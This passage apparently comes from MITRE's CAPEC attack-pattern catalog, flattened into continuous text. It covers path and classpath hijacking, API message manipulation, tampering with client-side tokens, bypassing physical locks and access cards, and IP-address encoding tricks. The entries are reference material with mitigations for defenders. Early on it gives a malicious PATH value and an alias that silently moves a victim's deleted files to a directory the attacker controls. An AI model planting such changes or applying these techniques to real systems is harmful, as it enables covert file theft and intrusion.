dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker. A standard UNIX path looks similar to this /bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf: /evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution. The attacker must be able to write to redirect search paths on the victim host. Very High High Modification of Resources This attack can be accomplished in two ways. An attacker can insert a malicious program into the path or classpath so that when a known command is executed then the system instead executes the trojans. Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command "rm" could be aliased to "mv" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting alias rm=mv /usr/home/attacker In this case the attacker retains a copy of all the files the victim attempts to remove. Low To identify and execute against an over-privileged system interface Design: Enforce principle of least privilege Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program Implementation: Host integrity monitoring Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity 426 Targeted 427 Targeted 428 Secondary 706 Targeted 1000 Attack Pattern ChildOf 13 1000 Attack Pattern ChildOf 148 1000 Attack Pattern ChildOf 154 Exploitation Medium Medium Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.38.1][REF-2] Cigital, Inc 2007-01-01 [R.38.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Description Summary An attacker hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the attacker creating an event within the sub-application. Assume the attacker hosts a "virtual sale" of rare items. As other users enter the event, the attacker records via MITM proxy the user_ids and usernames of everyone who attends. The attacker would then be able to spam those users within the application using an automated script. Application Layer Client-side Web Application Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Low A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 311 Targeted 319 Targeted 419 Secondary 602 Secondary 1000 Attack Pattern ChildOf 117 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system. Despite the use of MITM software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Man-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client. Application Layer Server-side Host Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Low A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 471 Targeted 345 Targeted 346 Targeted 602 Secondary 311 Secondary 1000 Attack Pattern ChildOf 94 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process. Application Layer Server-side Host Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Medium A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 471 Targeted 345 Targeted 346 Targeted 602 Secondary 311 Secondary 1000 Attack Pattern ChildOf 384 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud. Transport Layer Server-side Host Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Medium A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 471 Targeted 345 Targeted 346 Targeted 602 Secondary 311 Secondary 1000 Attack Pattern ChildOf 385 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the destination of various application interface elements. Application Layer Server-side Host Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Medium A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 471 Targeted 345 Targeted 346 Targeted 602 Secondary 311 Secondary 1000 Attack Pattern ChildOf 386 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Type (Attack_Pattern -> Attack_Pattern) An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination. For example, an in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data: [Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link] By altering the destination of "Claim_Link" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking "Yes" or "No" causes the user to load the attackers' code. Application Layer Server-side Host Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Medium A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 471 Targeted 345 Targeted 346 Targeted 602 Secondary 311 Secondary 1000 Attack Pattern ChildOf 386 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content MITRE Content Team MITRE 2013-06-21 Updated Summary Sean Barnum MITRE 2010-10-27 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system. Application Layer Client-side Host Uses Protocol Uses Protocol Targeted software is utilizing application framework APIs Low A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy. 345 Targeted 346 Targeted 602 Secondary 311 Secondary 1000 Attack Pattern ChildOf 384 Tom Stracener Sean Barnum So Many Ways [...]: Exploiting Facebook and YoVille Defcon 18 2010 Tom Stracener MITRE 2010-10-27 Tom Stracener MITRE 2010-10-27 Sean Barnum MITRE 2010-10-27 Review and revision of content Sean Barnum MITRE 2010-10-27 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation. Enumerate information passed to client side The attacker identifies the parameters used as part of tokens to take business or security decisions Use WebScarab to reveal hidden fields while browsing. env-Web Use a sniffer to capture packets env-ClientServer env-Peer2Peer env-CommProtocol View source of web page to find hidden fields env-Web Examine URL to see if any opaque tokens are in it env-Web Disassemble or decompile client-side application env-ClientServer env-Peer2Peer Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc. env-ClientServer env-Peer2Peer Opaque hidden form fields in a web page env-Web Opaque session tokens/tickets env-Web env-Peer2Peer env-ClientServer env-CommProtocol Opaque protocol fields env-ClientServer env-Peer2Peer env-CommProtocol Opaque Resource Locator env-Web env-Peer2Peer env-ClientServer env-CommProtocol At least one opaque client-side token found No opaque client-side tokens found Determine protection mechanism for opaque token The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may may be obfuscated or a full blown encryption may be used. Look for signs of well-known character encodings env-Web env-ClientServer env-Peer2Peer env-CommProtocol Look for cryptographic signatures env-Web env-ClientServer env-Peer2Peer env-CommProtocol Look for delimiters or other indicators of structure env-Web env-ClientServer env-Peer2Peer env-CommProtocol Standard signatures of well-known encodings detected env-Web env-ClientServer env-Peer2Peer env-CommProtocol Token or structural block's length being multiple of well-known block size of a cryptographic algorithm env-Web env-ClientServer env-Peer2Peer env-CommProtocol Clear structural boundaries or delimiters env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in previous step env-Web env-ClientServer env-Peer2Peer env-CommProtocol Protection/encoding scheme identified No information about protection/encoding scheme could not be determined Modify parameter/token values Trying each parameter in turn, the attacker modifies the values Modify tokens logically env-Web env-ClientServer env-Peer2Peer env-CommProtocol Modify tokens arithmetically env-Web env-ClientServer env-Peer2Peer env-CommProtocol Modify tokens bitwise env-Web env-ClientServer env-Peer2Peer env-CommProtocol Modify structural components of tokens env-Web env-ClientServer env-Peer2Peer env-CommProtocol Modify order of parameters/tokens env-Web env-ClientServer env-Peer2Peer env-CommProtocol Success outcome in first step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in first step env-Web env-ClientServer env-Peer2Peer env-CommProtocol Cycle through values for each parameter. Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server Use network-level packet injection tools such as netcat env-Web env-ClientServer env-Peer2Peer env-CommProtocol Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc. env-Web Use modified client (modified by reverse engineering) env-ClientServer env-Peer2Peer env-CommProtocol Use debugging tools to modify data in client env-ClientServer env-Peer2Peer Success outcome in first step env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in first step env-Web env-ClientServer env-Peer2Peer env-CommProtocol Subversion of security controls on server Client token reset by server Detailed error message describing problem with token, received from server Unexpected/invalid token/parameter value in application logs on server Reset session upon receipt of unexpected/invalid token/parameter value An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system. For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere. Medium Very High Modification of Resources With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, he/she proceeds. Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. "u" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes "u" for "a" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct "flip" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode. Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. CVE-2006-0944 Medium If the client site token is obfuscated. High If the client site token is encrypted. The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data. Tamper with the client side data token and observe the effects it has on interaction with the system. This attack is in and of itself a trial-and-error-based probing technique. One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic "message authentication code" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a "malicious" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help. Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash) Make sure that all session tokens use a good source of randomness Perform validation on the server side to make sure that client side data tokens are consistent with what is expected. Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity 353 Targeted 285 Secondary 302 Targeted 472 Targeted 565 Targeted 315 Targeted 539 Targeted 384 Secondary 233 Secondary 1000 Attack Pattern ChildOf 22 1000 Category ChildOf 223 Sensitive information stored client side must be integrity checked upon return before use Reluctance to Trust Never Assuming that your Secrets are Safe Least Privilege Complete Mediation Never Use Unvalidated Input as Part of a Directive to any Internal Component Penetration Exploitation High High Low All All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Eugene Lebanidze Cigital, Inc 2007-02-27 Added new examples and other content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Solutions and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Eugene Lebanidze Cigital, Inc 2007-02-27 Added new examples and other content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Solutions and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points. 1000 Category ChildOf 436 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures. 1000 Attack Pattern ChildOf 390 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened. 1000 Attack Pattern ChildOf 391 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick). 1000 Attack Pattern ChildOf 391 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with. 1000 Attack Pattern ChildOf 391 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms. 1000 Attack Pattern ChildOf 390 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker bypasses the security of a card-based system by using techniques such as cloning access cards or using brute-force techniques. Card-based systems are widespread throughout business, government, and supply-chain management. Attacks against card-based systems vary widely based on the attackers' goals, but commonly include unauthorized reproduction of cards, brute-force creation of valid card-values, and attacks against systems which read or process card data. Due to the inherent weaknesses of card and badge security, high security environments will rarely rely upon the card or badge alone as a security mechanism. Common card based systems are used for financial transactions, user identification, and access control. Cloning attacks involve making an unauthorized copy of a user's card while brute-force attacks involve creating new cards with valid values. Denial of service attacks against card-based systems involve rendering the reader, or the card itself, to become disabled. Such attacks may be useful in a fail-closed system for keeping authorized users out of a location while a crime is in progress, whereas fail-open systems may grant access, or an alarm my fail to trigger, if an attacker disables or damages the card authentication device. 1000 Attack Pattern ChildOf 395 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original. 1000 Attack Pattern ChildOf 396 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content CAPEC Content Team MITRE 2013-12-18 Updated Description Summary CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals. Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks. For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons. The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created. 1000 Attack Pattern ChildOf 396 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse. RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification. 1000 Attack Pattern ChildOf 396 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names, URL, IP address, or IP Address ranges. The issue that the attacker can exploit is that these design assumptions may not be validated against a variety of different possible encodings and network address location formats. Applications that use naming for creating policy namespaces for managing access control may be susceptible to queryin directly by IP addresses, which is ultimately a more generally authoritative way of communicating on a network. Alternative IP addresses can be used by the attacker to bypass application access control in order to gain access to data that is only protected by obscuring its location. In addition this type of attack can be used as a reconnaissance mechanism to provide entry point information that the attacker gathers to penetrate deeper into the system. The target software must fail to anticipate all of the possible valid encodings of an IP/web address. High Medium Injection Protocol Manipulation API Abuse An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions. Low The attacker has only to try IP address combinations. Ability to communicate with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. Design: Default deny access control policies Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges) Implementation: Perform input validation for all remote content. Confidentiality Access_Control Authorization Gain privileges / assume identity Malicious input delivered through standard input Varies with instantiation of attack pattern. Malicious payload may be passed directly from application client, such as the web browser. Client machine and client network Enables attacker to view and access unexpected network services. 291 Targeted 180 Targeted 41 Targeted 345 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern ChildOf 267 Penetration Medium Medium High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.4.1][REF-2] Cigital, Inc 2007-01-01 [R.4.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Prerequisites,Resources Required and Method of Attack Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Prerequisites,Resources Required and Method of Attack Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Prerequisites, Resources Required and Method of Attack Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Prerequisites, Resources Required and Method of Attack CAPEC Content Team MITRE 2014-02-06 